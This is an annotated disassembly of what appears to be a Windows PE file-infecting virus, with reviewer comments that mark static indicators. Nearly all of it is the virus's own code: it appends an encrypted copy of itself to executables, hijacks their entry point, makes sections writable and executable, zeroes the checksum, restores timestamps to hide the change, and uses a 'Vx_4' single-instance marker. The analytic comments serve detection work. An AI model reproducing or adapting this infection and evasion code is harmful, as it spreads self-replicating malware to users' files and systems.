; Shuffle the byte table at [ebp+1039A8h]: six times, swap entry 0 with the
; entry indexed by the helper result in edx (bound 6). The checks after the
; loop jump back to loc_31433550 and reshuffle when a combination is not
; allowed for the current option bits. The table looks like a permutation of
; register numbers for a generated stub - NOTE(review): inferred, confirm.
        push 6
        pop ecx
loc_31433556: ; CODE XREF: sub_3143344B+129j
        push 6
        pop eax
        call near ptr dword_31431B40+43h
        mov al, [ebp+1039A8h]
        xchg al, [edx+ebp+1039A8h]
        mov [ebp+1039A8h], al
        loop loc_31433556
        test dword ptr [ebp+1039B0h], 8
        jnz short loc_3143358B
        cmp byte ptr [ebp+1039AAh], 1
        jz short loc_31433550
loc_3143358B: ; CODE XREF: sub_3143344B+135j
        test dword ptr [ebp+1039B0h], 10000000h
        jz short loc_314335B2
        cmp byte ptr [ebp+1039A8h], 5
        jz short loc_31433550
        cmp byte ptr [ebp+1039A9h], 5
        jz short loc_31433550
        cmp byte ptr [ebp+1039AAh], 5
        jz short loc_31433550
loc_314335B2: ; CODE XREF: sub_3143344B+14Aj
        test dword ptr [ebp+1039B0h], 400000h
        jz short loc_314335C7
        cmp byte ptr [ebp+1039A8h], 2
        ja short loc_31433550
loc_314335C7: ; CODE XREF: sub_3143344B+171j
        and dword ptr [ebp+1042F0h], 0
        call loc_31432845 ; not in this span; the later code treats [ebp+101069h] as the length of what it left at 1039BCh
        call loc_3143331B ; rounded sizes into 1042B0h and 1042A8h
        call sub_3143384E ; drop the current view and handles
; Reopen and remap the file with room for the appended data.
        mov ebx, [ebp+1042A8h]
        add ebx, [ebp+1042ACh]
        call sub_31433249
        jz loc_31433845
        mov esi, [ebp+1042A4h]
        mov ebx, [esi+3Ch]
        add ebx, esi
        call sub_31433360
        jb loc_31433845
; The section returned in edx is marked 0E0000060h: code, initialized data,
; execute, read and write. A final section that is writable and executable is
; a useful static indicator.
        or dword ptr [edx+24h], 0E0000060h
        mov edi, esi
        push edx
        push esi
        add edi, [edx+14h]
        add edi, [edx+10h] ; edi = end of that section's raw data in the view
        test dword ptr [ebp+1039B0h], 20000000h
        jnz short loc_3143363B
; Option 20000000h clear: the [ebp+101069h] bytes at 1039BCh go first.
        mov [ebp+1042F4h], edi
        lea esi, [ebp+1039BCh]
        mov ecx, [ebp+101069h]
        rep movsb
; Append 0A6Fh dwords (29BCh bytes) starting at [ebp+101000h].
loc_3143363B: ; CODE XREF: sub_3143344B+1DAj
        push edi
        mov ecx, 0A6Fh
        lea esi, [ebp+101000h]
        rep movsd
        mov cl, 0
        jecxz short loc_3143364F ; ecx is 0 after rep movsd, so the byte copy below never runs
        rep movsb
; Option 20000000h set: place the 1039BCh block inside another section, the
; one sub_31432404 reports in [ebp+1042E4h] for the value at [ebx+28h]
; (AddressOfEntryPoint in a PE32 header).
loc_3143364F: ; CODE XREF: sub_3143344B+200j
        test dword ptr [ebp+1039B0h], 20000000h
        jz loc_3143370D
        push dword ptr [ebx+28h]
        call sub_31432404
        mov edx, [ebp+1042E4h]
        test edx, edx
        jz loc_3143370D
        mov esi, [ebp+1042A4h]
        mov ecx, [edx+10h]
        or dword ptr [edx+24h], 0E0000060h
        sub ecx, [edx+8] ; [edx+10h] - [edx+8]: unused raw bytes at the end of that section
        jnb short loc_3143368C
        xor ecx, ecx
loc_3143368C: ; CODE XREF: sub_3143344B+23Dj
        add esi, [edx+14h]
        cmp ecx, [ebp+101069h]
        mov ecx, [ebp+101069h]
        jb short loc_314336F3 ; slack smaller than the block: use the overwrite path
; Slack is large enough: the block is written into it and [edx+8] grows.
        mov edi, [esp+14h+var_14]
        and dword ptr [ebp+101069h], 0
        and dword ptr [edi+69h], 0
        mov edi, [edx+8]
        add [edx+8], ecx
        add esi, edi
        xchg esi, edi
        mov eax, [ebp+1042B8h]
        test dword ptr [ebp+1039B0h], 40h
        jz short loc_314336CC
        neg dword ptr [eax]
loc_314336CC: ; CODE XREF: sub_3143344B+27Dj
        add esi, [edx+0Ch]
        sub [eax], esi
        mov [ebp+1042F0h], esi ; candidate new entry value
        mov esi, [ebx+28h]
        add [eax], esi
        test dword ptr [ebp+1039B0h], 40h
        jz short loc_314336EA
        neg dword ptr [eax]
loc_314336EA: ; CODE XREF: sub_3143344B+29Bj
        push ecx
        call loc_3143331B
        pop ecx
        jmp short loc_314336FF
; ---------------------------------------------------------------------------
; Overwrite path: ecx bytes starting at the location computed from [ebx+28h]
; are first copied to edi (the end of the appended data), then the block is
; written over them.
loc_314336F3: ; CODE XREF: sub_3143344B+250j
        add esi, [ebx+28h]
        sub esi, [edx+0Ch]
        push ecx
        push esi
        rep movsb
        pop edi
        pop ecx
loc_314336FF: ; CODE XREF: sub_3143344B+2A6j
        lea esi, [ebp+1039BCh]
        mov [ebp+1042F4h], edi
        rep movsb
loc_3143370D: ; CODE XREF: sub_3143344B+20Ej
              ; sub_3143344B+224j
        pop edi ; start of the appended 29BCh-byte copy
        pop esi
; A 16-bit value taken from the timestamp counter is stored at copy+11Eh and
; passed in dx, with eax = copy+137h, to the routine at 31431120h. That
; address has the same offset as sub_31439120 in the second image of the code
; at 31439000h, which XORs 2879h bytes with a rolling key - presumably the
; same routine.
        rdtsc
        xchg eax, edx
        lea eax, [edi+137h]
        cmp dl, [ebp+1039AEh]
        jnz short loc_31433726
        imul edx, 12345678h
loc_31433726: ; CODE XREF: sub_3143344B+2D3j
        mov [eax-19h], dx
        call near ptr locret_3143111E+2
        pop edx ; section header pushed before the copy
        mov ecx, [edx+0Ch]
        add ecx, [edx+10h]
        test dword ptr [ebp+1039B0h], 20000000h
        lea eax, [ecx+5]
        jnz short loc_31433758
        mov [ebp+1042F0h], ecx
        add eax, [ebp+101069h]
        and dword ptr [edi+69h], 0
loc_31433758: ; CODE XREF: sub_3143344B+2F8j
        sub eax, [ebx+28h]
        mov [edi+54h], eax
; Stamp the header at +8 (TimeDateStamp) with the marker value that the
; validation at the top of this function rejects, if bit 0 of
; [ebp+103F6Ch] is set.
        test dword ptr [ebp+103F6Ch], 1
        jz short loc_31433774
        mov dword ptr [ebx+8], 0A0A0A0A0h
loc_31433774: ; CODE XREF: sub_3143344B+320j
        test dword ptr [ebp+1039B0h], 400000h
        jz short loc_31433787
        push edx
        call sub_31432EE1 ; call-site patching variant; it clears [ebp+1042F0h] when it patches
        pop edx
; If [ebp+1042F0h] is non-zero it replaces the value at [ebx+28h]; otherwise
; the header value is left unchanged.
loc_31433787: ; CODE XREF: sub_3143344B+333j
        mov ecx, [ebp+1042F0h]
        jecxz short loc_31433794
        mov [ebx+28h], ecx
        jmp short loc_314337A1
; ---------------------------------------------------------------------------
loc_31433794: ; CODE XREF: sub_3143344B+342j
        mov ecx, [ebp+1042ECh]
        jecxz short loc_3143379E
        jmp short loc_314337A1
; ---------------------------------------------------------------------------
loc_3143379E: ; CODE XREF: sub_3143344B+34Fj
        mov ecx, [ebx+28h]
loc_314337A1: ; CODE XREF: sub_3143344B+347j
              ; sub_3143344B+351j
        test dword ptr [ebp+1039B0h], 3
        jz short loc_314337C1
        mov eax, [ebp+1042F4h]
        add ecx, [ebp+1042DCh]
        add eax, [ebp+1042D8h]
        add [eax], ecx
; Grow the section at edx and the image: the field at +8 is raised to at least
; the one at +10h, +10h grows by [ebp+1042A8h], +8 and the header dword at +50h
; (SizeOfImage) grow by [ebp+1042B0h], and the header dword at +58h (CheckSum)
; is zeroed.
loc_314337C1: ; CODE XREF: sub_3143344B+360j
        mov ecx, [edx+10h]
        mov eax, [ebp+1042A8h]
        cmp [edx+8], ecx
        jnb short loc_314337D2
        mov [edx+8], ecx
loc_314337D2: ; CODE XREF: sub_3143344B+382j
        add [edx+10h], eax
        and dword ptr [ebx+58h], 0
        mov eax, [ebp+1042B0h]
        push 29BCh
        add [edx+8], eax
        pop ecx
        add [ebx+50h], eax
; Outer byte transform over the appended copy at edi: ecx = 29BCh bytes (plus
; [ebp+101069h] when option 20000000h is set), key in dl, key step in dh
; (0, 1, or the byte at 1039AFh), combined by add or by xor depending on
; option 4000h.
        mov dl, [ebp+1039AEh]
        test dword ptr [ebp+1039B0h], 20000000h
        jz short loc_31433803
        add ecx, [ebp+101069h]
loc_31433803: ; CODE XREF: sub_3143344B+3B0j
        mov dh, 0
        test dword ptr [ebp+1039B0h], 20000h
        jnz short loc_31433825
        inc dh
        test dword ptr [ebp+1039B0h], 40000h
        jnz short loc_31433825
        mov dh, [ebp+1039AFh]
loc_31433825: ; CODE XREF: sub_3143344B+3C4j
              ; sub_3143344B+3D2j
        test dword ptr [ebp+1039B0h], 4000h
        jnz short loc_3143383C
loc_31433831: ; CODE XREF: sub_3143344B+3EDj
        mov al, [edi]
        add al, dl
        stosb
        add dl, dh
        loop loc_31433831
        jmp short loc_31433845
; ---------------------------------------------------------------------------
loc_3143383C: ; CODE XREF: sub_3143344B+3E4j
              ; sub_3143344B+3F8j
        mov al, [edi]
        xor al, dl
        stosb
        add dl, dh
        loop loc_3143383C
; Common exit, also the target after a fault: unlink the exception record,
; discard the handler slot, then fall through (there is no retn) into the
; cleanup in sub_3143384E.
loc_31433845: ; CODE XREF: UPX2:31433446j
              ; sub_3143344B+11j ...
        xor edx, edx
        mov esp, fs:[edx]
        pop dword ptr fs:[edx]
        pop eax
sub_3143344B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; sub_3143384E: release the view, the mapping and the file, putting the saved
; timestamps (and, past this span, the saved attributes) back on the file.
; Because the timestamps are restored, last-write time does not reveal the
; modification; compare content hashes or header fields instead.
; The labels inside are also the failure targets of sub_31433249.
sub_3143384E proc near ; CODE XREF: sub_3143344B+18Dp
        cmp dword ptr [ebp+104288h], 0
        jz locret_3143331A ; nothing open
        push dword ptr [ebp+1042A4h]
        call dword ptr [ebp+103EDEh] ; (view base): presumably unmaps the view; name not visible here
loc_31433867: ; CODE XREF: sub_31433249+C5j
        push dword ptr [ebp+1042A0h]
        call dword ptr [ebp+103E52h] ; pointer resolved in the loader from a name that decodes to CloseHandle
        lea ecx, [ebp+10428Ch]
        lea edx, [ebp+104294h]
        push ecx
        push edx
        push 0
        push dword ptr [ebp+104288h]
        call dword ptr [ebp+103ED2h] ; same argument layout as the earlier time query: writes the two saved timestamps back
loc_3143388F: ; CODE XREF: sub_31433249+6Bj
              ; sub_31433249+82j ...
push dword ptr [ebp+104288h] call dword ptr [ebp+103E52h] loc_3143389B: ; CODE XREF: sub_31433249+45j lea esi, [ebp+104174h] push dword ptr [ebp+104284h] push esi call dword ptr [ebp+103ECEh] and dword ptr [ebp+104288h], 0 retn sub_3143384E endp ; --------------------------------------------------------------------------- dw 0E8h dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah dd 0E8001039h, 0FFFFE0B3h, 4C261h, 7010302h, 17D50506h dd 7ABBC4FBh, 119415FFh, 0FF8B0100h, 1C39068h, 0FFC48BEDh dd 0E85B93D0h, 59h, 824648Bh, 4EBB8h, 64FAEB00h, 18A167h dd 0F30408Bh, 830240B6h, 3C7500F8h, 0E8h, 0ED815D00h, 402334h dd 237B858Bh, 85030040h, 402383h, 858BF08Bh, 40237Fh, 23838503h dd 8B500040h, 0ACC933FEh, 238B8532h, 41AA0040h, 23878D3Bh dd 0EF7C0040h, 64C02BC3h, 896430FFh, 5678B820h, 3871234h dd 6000h, 7BB0h, 31420000h, 1E00h db 78h ; =============== S U B R O U T I N E ======================================= sub_31433A45 proc near ; CODE XREF: UPX2:31433A7Fp pusha push ebp mov ebp, esp call loc_31433A58 call near ptr byte_31433AF3 jmp near ptr byte_31433AAB sub_31433A45 endp ; --------------------------------------------------------------------------- loc_31433A58: ; CODE XREF: sub_31433A45+4p push dword ptr fs:0 mov fs:0, esp xor ebx, ebx push ebx push ebx push ebx push ebx push 80000000h push ebx push ebx push ebx push ebx push ebx push 10h push ebx push 800h call sub_31433A45 xor [ecx], esi fld tbyte ptr 
[eax+0] add [ecx], al add [eax+0], ch ; --------------------------------------------------------------------------- dw 0 dd 406880h, 680000h, 4 dup(0) db 3 dup(0) byte_31433AAB db 0 ; CODE XREF: sub_31433A45+Ej dd 11h dup(0) db 3 dup(0) byte_31433AF3 db 0 ; CODE XREF: sub_31433A45+9p dd 0D7h dup(0) dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 1468h dup(0) ; --------------------------------------------------------------------------- loc_31439000: ; DATA XREF: UPX2:3143C2F8o call $+5 cld mov eax, [esp] mov ecx, [eax+29ABh] mov [eax+32F3h], ebx and ecx, 400000h mov ebx, [esp+4] jz short loc_3143904D pop ecx mov [eax+32F7h], esi mov cl, [eax+29AFh] mov [eax+32FBh], edi cmp cl, 0E8h jz short loc_31439041 mov ebx, [eax+29B1h] jmp short loc_3143904B ; --------------------------------------------------------------------------- loc_31439041: ; CODE XREF: UPX2:31439037j mov ecx, [eax+29B0h] mov ebx, [ecx+ebx+2] loc_3143904B: ; CODE XREF: UPX2:3143903Fj mov ebx, [ebx] loc_3143904D: ; CODE XREF: UPX2:3143901Fj push ebp mov ebp, eax sub dword ptr [esp+4], 10E05h sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+1039BCh] mov ecx, 0D5h rep movsb sldt cx test ecx, ecx jnz short loc_3143907B or eax, 0FFFFFFFFh int 2Eh ; DOS 2+ internal - EXECUTE COMMAND ; DS:SI -> counted CR-terminated command string loc_3143907B: ; CODE XREF: UPX2:31439074j and ebx, 0FFFFF000h loc_31439081: ; CODE XREF: UPX2:31439090j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_31439092 loc_3143908A: ; CODE XREF: UPX2:3143909Fj sub ebx, 100h jnz short loc_31439081 loc_31439092: ; CODE XREF: UPX2:31439088j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3143908A add edx, ebx mov esi, [edx+20h] loc_314390A6: ; CODE XREF: UPX2:3143911Ej mov ecx, [edx+18h] add esi, ebx push ecx loc_314390AC: ; CODE XREF: UPX2:loc_314390C0j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_314390C0 cmp dword ptr [eax+5], 6441636Fh jz short loc_314390C5 loc_314390C0: ; CODE XREF: 
UPX2:314390B5j loop loc_314390AC pop ecx jmp short loc_314390F0 ; --------------------------------------------------------------------------- loc_314390C5: ; CODE XREF: UPX2:314390BEj sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+101137h] lea ecx, [ebp+101120h] mov dx, [eax-19h] call ecx jmp short loc_31439137 ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143917E loc_314390F0: ; CODE XREF: UPX2:314390C3j ; sub_3143917E+10j ... mov eax, [ebp+1039B0h] and eax, 400000h jz short loc_3143911C lea esi, [ebp+1039B4h] lodsd mov edi, [esp+arg_0] stosd mov ebx, [ebp+1042F8h] movsb mov edi, [ebp+104300h] mov esi, [ebp+1042FCh] loc_3143911C: ; CODE XREF: sub_3143917E-83j pop ebp retn ; END OF FUNCTION CHUNK FOR sub_3143917E ; --------------------------------------------------------------------------- jl short loc_314390A6 ; =============== S U B R O U T I N E ======================================= sub_31439120 proc near ; CODE XREF: sub_3143B44B+2DFp push ebx mov ecx, 2879h mov ebx, edx loc_31439128: ; CODE XREF: sub_31439120+13j xor [eax], dl sub dl, bl add eax, 1 xchg bl, bh xchg dl, dh loop loc_31439128 pop ebx retn sub_31439120 endp ; --------------------------------------------------------------------------- loc_31439137: ; CODE XREF: UPX2:314390EEj call near ptr loc_31439146+2 inc ebx insb outsd jnb short near ptr loc_314391A3+3 dec eax popa outsb db 64h insb loc_31439146: ; CODE XREF: UPX2:loc_31439137p add gs:[ebx-1], dl setalc mov [ebp+103E52h], eax call near ptr loc_31439162+1 inc ebx jb short loc_314391BE popa jz short near ptr loc_314391C0+1 inc ebp jbe short near ptr loc_314391C0+4 outsb jz short loc_314391A3 loc_31439162: ; CODE XREF: UPX2:31439151p add [ebx-1], dl setalc mov [ebp+103E56h], eax call sub_3143917E inc edi db 65h jz short near ptr loc_314391C0+1 popa jnb short 
near ptr loc_314391EA+2 inc ebp jb short near ptr loc_314391EA+3 outsd jb short $+2 ; =============== S U B R O U T I N E ======================================= sub_3143917E proc near ; CODE XREF: UPX2:3143916Cp arg_0 = dword ptr 4 ; FUNCTION CHUNK AT 314390F0 SIZE 0000002E BYTES ; FUNCTION CHUNK AT 31439524 SIZE 0000000B BYTES push ebx call esi ; lstrcatA mov [ebp+103E5Ah], eax call sub_3143954F test eax, eax jz loc_314390F0 push eax call dword ptr [ebp+103E5Ah] test eax, eax jnz loc_31439524 loc_314391A3: ; CODE XREF: UPX2:31439160j ; UPX2:3143913Fj cmp byte ptr [ebp+10152Fh], 1 jnz short loc_314391C0 push dword ptr [ebp+1042F8h] dec byte ptr [ebp+10152Fh] pop dword ptr [ebp+101588h] loc_314391BE: ; CODE XREF: UPX2:31439157j jmp short loc_314391C7 ; --------------------------------------------------------------------------- loc_314391C0: ; CODE XREF: sub_3143917E+2Cj ; UPX2:3143915Aj ... and dword ptr [ebp+101588h], 0 loc_314391C7: ; CODE XREF: sub_3143917E:loc_314391BEj and dword ptr [ebp+101578h], 0 and dword ptr [ebp+10157Ch], 0 and dword ptr [ebp+101580h], 0 push edi mov byte ptr [ebp+1012D4h], 1 mov [ebp+103E5Eh], esi loc_314391EA: ; CODE XREF: UPX2:31439176j ; UPX2:31439179j lea esi, [ebp+1015F4h] xor ecx, ecx lea edi, [ebp+103E6Ah] mov cl, 20h call sub_3143958C pop edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jz loc_314392E3 mov eax, [edi+14h] push 40h add eax, ebx push 8001000h mov [ebp+103E62h], eax push 7318h push 0 call dword ptr [ebp+103EE2h] test eax, eax jz loc_31439524 xchg eax, edi lea esi, [ebp+101000h] mov ebp, edi mov ecx, 0CC6h sub ebp, 101000h lea edx, [ebp+101254h] rep movsd jmp edx ; --------------------------------------------------------------------------- sub esp, 20h mov edi, esp push 8 xor eax, eax pop ecx lea edx, [ebp+101B3Dh] rep stosd mov edi, esp mov [edi+10h], edx inc byte ptr [edi+1Ch] push edi push 10003h call dword ptr [ebp+103E62h] add esp, 20h test eax, eax jz loc_31439524 xchg eax, edi push 0 push 1 push 80000400h push 
10000h call dword ptr [ebp+103E62h] test eax, eax jz loc_31439524 push 0 push eax push 40000h push 0 shr eax, 0Ch push edi push 1 push eax push 10001h call dword ptr [ebp+103E62h] push 1000Ah call dword ptr [ebp+103E62h] call loc_314392D3 jmp loc_31439524 ; --------------------------------------------------------------------------- loc_314392D3: ; CODE XREF: sub_3143917E+14Bp ; sub_3143917E+162j push 0 pop ecx jecxz short locret_314392E2 push 0Ah call dword ptr [ebp+103ED6h] jmp short loc_314392D3 ; --------------------------------------------------------------------------- locret_314392E2: ; CODE XREF: sub_3143917E+158j retn ; --------------------------------------------------------------------------- loc_314392E3: ; CODE XREF: sub_3143917E+8Bj cmp dword ptr [ebp+103E82h], 0 jz loc_31439524 call near ptr loc_314392FA+1 dec esi push esp inc esp dec esp dec esp loc_314392FA: ; CODE XREF: sub_3143917E+172p add bh, bh sub_3143917E endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al lea esi, [ebp+1017CEh] xor ecx, ecx lea edi, [ebp+103EEAh] mov cl, 0Eh xchg eax, ebx call sub_3143958C cmp dword ptr [ebp+103F1Eh], 0 jz loc_31439524 mov eax, [ebp+103EEEh] push dword ptr [eax+1] pop dword ptr [ebp+103907h] mov eax, [ebp+103F06h] push dword ptr [eax+1] pop dword ptr [ebp+103954h] mov eax, [ebp+103EF2h] push dword ptr [eax+1] pop dword ptr [ebp+10395Bh] mov ecx, [ebp+103EF6h] jecxz short loc_31439373 push dword ptr [ecx+1] pop dword ptr [ebp+103968h] mov ecx, [ebp+103EFEh] jecxz short loc_31439373 push dword ptr [ecx+1] pop dword ptr [ebp+103975h] loc_31439373: ; CODE XREF: UPX2:31439357j ; UPX2:31439368j call sub_31439530 lea edi, [ebp+103F74h] mov ecx, edi push 0 neg cl push dword ptr [eax+4] and ecx, 3 push 40h add edi, ecx push edi push 0 push 18h lea esi, [ebp+1015DBh] mov ecx, 19h lea eax, ds:0FFFFFFFEh[ecx*2] stosw lea eax, ds:0[ecx*2] stosw lea eax, [edi+4] stosd xor ah, ah lea edx, [ebp+103E20h] loc_314393BC: ; CODE XREF: UPX2:314393C5j lodsb mov 
[edx], ax stosw add edx, 2 loop loc_314393BC mov edx, esp push 0 push 7318h mov ecx, esp push 0 mov eax, esp push 0 push 8000000h push 40h push ecx push edx push 0Eh push eax call dword ptr [ebp+103EFAh] pop eax add esp, 40h push 7318h mov edx, esp push 0 mov ecx, esp push 40h push 0 push 2 push edx push 0 push 7318h push 0 push ecx push 0FFFFFFFFh push eax call dword ptr [ebp+103F02h] pop edi pop ecx test edi, edi jz loc_31439524 lea esi, [ebp+101000h] mov ecx, 0CC6h mov ebp, edi rep movsd sub ebp, 101000h lea eax, [ebp+10143Ah] jmp eax ; --------------------------------------------------------------------------- dw 5450h dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h dd 103E52h ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143917E loc_31439524: ; CODE XREF: sub_3143917E+1Fj ; sub_3143917E+B2j ... 
; Tail of the loc_31439524 chunk of sub_3143917E: call the pointer at
; [ebp+103E52h] (resolved earlier from a name that decodes to CloseHandle;
; its argument was pushed before the jump here) and leave through
; loc_314390F0.
        call dword ptr [ebp+103E52h]
        jmp loc_314390F0
; END OF FUNCTION CHUNK FOR sub_3143917E
; ---------------------------------------------------------------------------
        align 10h
; =============== S U B R O U T I N E =======================================
; sub_31439530: build two structures on the caller's stack and return with
; them still allocated.
;   first (5 dwords):  40001h, 0, 0, 0, 0
;   second (3 dwords): 0Ch, pointer to the first, 0
; Out: eax = address of the second structure; 20h bytes stay on the stack and
;      the caller must release them. Returns with jmp edx because the return
;      address was popped first.
; The layout matches SECURITY_ATTRIBUTES {nLength = 0Ch, descriptor, no
; inherit} pointing at a SECURITY_DESCRIPTOR with revision 1, control 4
; (DACL present) and a NULL DACL, which grants access to everyone -
; NOTE(review): interpretation of the constants, confirm.
sub_31439530 proc near ; CODE XREF: UPX2:loc_31439373p
                       ; sub_3143954F+2p
        pop edx
        push 0
        push 0
        push 0
        push 0
        push 40001h
        mov eax, esp
        push 0
        push eax
        push 0Ch
        mov eax, esp
        jmp edx
sub_31439530 endp
; ---------------------------------------------------------------------------
; Object name used by sub_3143954F. This literal and the "\BaseNamedObjects\VtSect"
; string further down the listing are concrete host indicators for this sample.
aVx_4_0 db 'Vx_4',0
        db 0
; =============== S U B R O U T I N E =======================================
; sub_3143954F: create or open a named object and return its handle in eax.
; The pointer at [ebp+103E56h] is stored by the loader from a lookup whose
; name bytes decode to CreateEventA; the arguments are (attributes from
; sub_31439530, 0, 0, name at [ebp+101549h]). By offset arithmetic that name
; is the 'Vx_4' string above - confirm at run time. The caller treats a
; non-zero last-error value after this call as "already present" and exits,
; so the object acts as a single-instance marker.
sub_3143954F proc near ; CODE XREF: sub_3143917E+9p
        xor ecx, ecx
        call sub_31439530
        lea edx, [ebp+101549h]
        push edx
        push ecx
        push ecx
        push eax
        call dword ptr [ebp+103E56h]
        add esp, 20h ; release the two structures left by sub_31439530
        retn
sub_3143954F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
        align 4
; Data whose meaning is not established by this span.
        dd 585858h, 3318h, 0E63h, 1, 2 dup(0)
        dd 29B0h, 0
; =============== S U B R O U T I N E =======================================
sub_3143958C proc near ; CODE XREF: sub_3143917E+7Cp
                       ; UPX2:31439312p ...
push ecx push esi push ebx call dword ptr [ebp+103E5Eh] stosd pop ecx loc_31439597: ; CODE XREF: sub_3143958C+Ej lodsb test al, al jnz short loc_31439597 loop sub_3143958C retn sub_3143958C endp ; =============== S U B R O U T I N E ======================================= sub_3143959F proc near ; CODE XREF: sub_3143B11D+25p ; FUNCTION CHUNK AT 31439629 SIZE 000003C0 BYTES ; FUNCTION CHUNK AT 314399F9 SIZE 00000027 BYTES lea edx, [ebp+101975h] push edx call dword ptr [ebp+103EB6h] mov [ebp+104278h], eax call near ptr loc_314395CC+1 dec esp outsd outsd imul esi, [ebp+70h], 50h jb short loc_31439629 jbe short near ptr loc_31439629+2 insb db 65h, 67h, 65h push esi popa insb jnz short loc_31439630 inc ecx loc_314395CC: ; CODE XREF: sub_3143959F+13p add [eax-1], dl sub_3143959F endp ; sp-analysis failed xchg eax, ebp pop esi db 3Eh adc [eax], al mov [ebp+10427Ch], eax retn ; --------------------------------------------------------------------------- db 5Ch ; \ db 42h ; B db 61h ; a db 73h ; s db 65h ; e db 4Eh ; N db 61h ; a db 6Dh ; m db 65h ; e db 64h ; d db 4Fh ; O db 62h ; b db 6Ah ; j db 65h ; e db 63h ; c db 74h ; t db 73h ; s db 5Ch ; \ db 56h ; V db 74h ; t db 53h ; S db 65h ; e db 63h ; c db 74h ; t db 0 db 6Ch ; l db 73h ; s db 74h ; t db 72h ; r db 6Ch ; l db 65h ; e db 6Eh ; n db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 4Dh ; M db 61h ; a db 70h ; p db 70h ; p db 69h ; i db 6Eh ; n db 67h ; g db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 50h ; P db 72h ; r db 6Fh ; o db 63h ; c db 65h ; e db 73h ; s db 73h ; s db 41h ; A ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143959F loc_31439629: ; CODE XREF: sub_3143959F+1Fj ; sub_3143959F+21j add [ebx+72h], al db 
65h popa jz short near ptr loc_31439693+2 loc_31439630: ; CODE XREF: sub_3143959F+2Aj push edx db 65h insd outsd jz short loc_3143969B push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314396A6+2 push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314396B2+3 push esp outsd outsd insb push 33706C65h xor dl, [ebx+6Eh] popa jo short near ptr loc_314396D1+1 push 4500746Fh js short loc_314396CF jz short near ptr loc_314396BB+1 push 64616572h add [esi+69h], al insb db 65h push esp imul ebp, [ebp+65h], 79536F54h jnb short loc_314396F0 db 65h insd push esp imul ebp, [ebp+65h], 65724600h db 65h dec esp imul esp, [edx+72h], 797261h inc edi db 65h jz short near ptr loc_314396D3+6 loc_31439693: ; CODE XREF: sub_3143959F+8Fj imul ebp, [ebp+41h], 69727474h loc_3143969B: ; CODE XREF: sub_3143959F+95j bound esi, [ebp+74h] db 65h jnb short loc_314396E2 add [edi+65h], al jz short near ptr loc_314396EB+1 loc_314396A6: ; CODE XREF: sub_3143959F+A2j imul ebp, [ebp+53h], 657A69h inc edi db 65h jz short loc_314396F8 loc_314396B2: ; CODE XREF: sub_3143959F+AFj imul ebp, [ebp+54h], 656D69h inc edi loc_314396BB: ; CODE XREF: sub_3143959F+C7j db 65h jz short near ptr loc_3143970A+1 outsd db 64h jnz short near ptr loc_31439729+5 db 65h dec eax popa outsb db 64h insb db 65h inc ecx add [edi+65h], al jz short near ptr loc_3143971D+6 loc_314396CF: ; CODE XREF: sub_3143959F+C5j db 65h insd loc_314396D1: ; CODE XREF: sub_3143959F+BEj jo short near ptr loc_31439717+2 loc_314396D3: ; CODE XREF: sub_3143959F+F1j imul ebp, [ebp+4Eh], 41656D61h add [edi+65h], al jz short near ptr loc_31439731+3 db 65h insd loc_314396E2: ; CODE XREF: sub_3143959F+FFj jo short near ptr loc_31439731+3 popa jz short near ptr loc_3143974E+1 inc ecx add [edi+65h], al loc_314396EB: ; CODE XREF: sub_3143959F+105j jz short 